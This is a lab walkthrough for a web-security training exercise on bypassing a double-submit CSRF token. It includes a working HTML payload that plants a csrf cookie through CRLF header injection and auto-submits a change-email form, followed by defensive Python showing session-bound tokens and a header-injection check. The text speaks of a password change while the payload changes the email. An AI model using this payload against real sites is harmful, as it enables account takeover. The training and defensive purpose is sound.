CSRF where Token is Duplicated in Cookie
Lab: CSRF where token is duplicated in cookie · Practitioner
Solution
Given: we have an exploit server and a vulnerable application where we want to change the current user's password while bypassing the CSRF defense.
OK, let's look at how the password change works. We observe that csrf is duplicated in the request body and in the cookies.
Cookies:

```
csrf=nt0nPbB6pgJTiVTFJeOZqPuOi7sdt3kf; session=FZB4InscWA9YK1iChehZ73tFUts8fZGW
```

In the body the token is `nt0nPbB6pgJTiVTFJeOZqPuOi7sdt3kf`. The two values match: the token is simply duplicated.
Let's try sending a request with xxx in place of the token in both places. The password change succeeds, so the server only checks that the cookie and the body value are equal. That means we can reuse the payload from the previous lab, CSRF where token is tied to non-session cookie.
This time we use any pair of matching values, and the cookie we plant is csrf rather than csrfKey.
```html
<form id="csrf" action="https://0aad008e030e9e7b826b1f6f001a0081.web-security-academy.net/my-account/change-email" method="POST">
  <input name="email" value="wr3dmast3r@m.com">
  <input name="csrf" value="xxx">
</form>
<img src="https://0aad008e030e9e7b826b1f6f001a0081.web-security-academy.net/?search=x%0d%0aSet-Cookie:%20csrf=xxx%3B%20path=%2F%3B%20SameSite=None%3B%20Secure" onerror="document.getElementById('csrf').submit()">
```
Lab solved.
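Why the lab falls and what fixes it, as an added example that is not part of the lab or the original write-up. The first function models the check the application performs (cookie value equals body value), which an arbitrary pair such as xxx/xxx satisfies once the cookie can be planted. The second pair of functions is an assumed hardened variant in which the token carries an HMAC over the session id, so a planted cookie of the attacker's choosing no longer validates. The last function is the input check that would have closed the injection vector used in the img payload: a reflected value must not contain CR or LF before it goes into a response header. The secret, session id and function names are constructed for the example.

```python
import hashlib
import hmac
import secrets

# Constructed server-side secret for the example; a real service loads this from
# configuration, never from source.
SERVER_SECRET = b"constructed-demo-secret-do-not-reuse"


def naive_double_submit_ok(cookie_token: str, body_token: str) -> bool:
    """The check the lab bypasses: accept when the cookie copy equals the body
    copy. Nothing binds the value to the session, so whoever can set the cookie
    passes with any matching pair (the lab uses xxx/xxx)."""
    return bool(cookie_token) and hmac.compare_digest(cookie_token, body_token)


def issue_bound_token(session_id: str) -> str:
    """Assumed hardened variant: token = nonce.HMAC(secret, session_id:nonce).
    The server issues this alongside the session, once per session or per form."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def bound_token_ok(session_id: str, cookie_token: str, body_token: str) -> bool:
    """Hardened check: the two copies must match AND the MAC must verify against
    the session that actually sent the request. A cookie planted by a third
    party cannot carry a valid MAC for the victim's session."""
    if not cookie_token or not hmac.compare_digest(cookie_token, body_token):
        return False
    nonce, sep, mac = body_token.partition(".")
    if not sep or not nonce or not mac:
        return False
    expected = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def safe_header_value(value: str) -> bool:
    """Header-injection guard: reflected input must not contain CR or LF, or a
    client-supplied string can terminate the header and append Set-Cookie."""
    return "\r" not in value and "\n" not in value


if __name__ == "__main__":
    # Values constructed to mirror the lab walkthrough.
    victim_session = "constructed-session-id"
    legit = issue_bound_token(victim_session)
    print("naive check, planted xxx/xxx:", naive_double_submit_ok("xxx", "xxx"))
    print("bound check, planted xxx/xxx:", bound_token_ok(victim_session, "xxx", "xxx"))
    print("bound check, legitimate token:", bound_token_ok(victim_session, legit, legit))
    print("search param from the payload is header-safe:",
          safe_header_value("x\r\nSet-Cookie: csrf=xxx; path=/; SameSite=None; Secure"))
```

The bound variant still relies on a cookie, so it should also be paired with SameSite attributes and a fix for the header-injection sink; binding the token to the session is what makes a planted cookie worthless, and the CR/LF check is what stops the cookie from being planted in the first place.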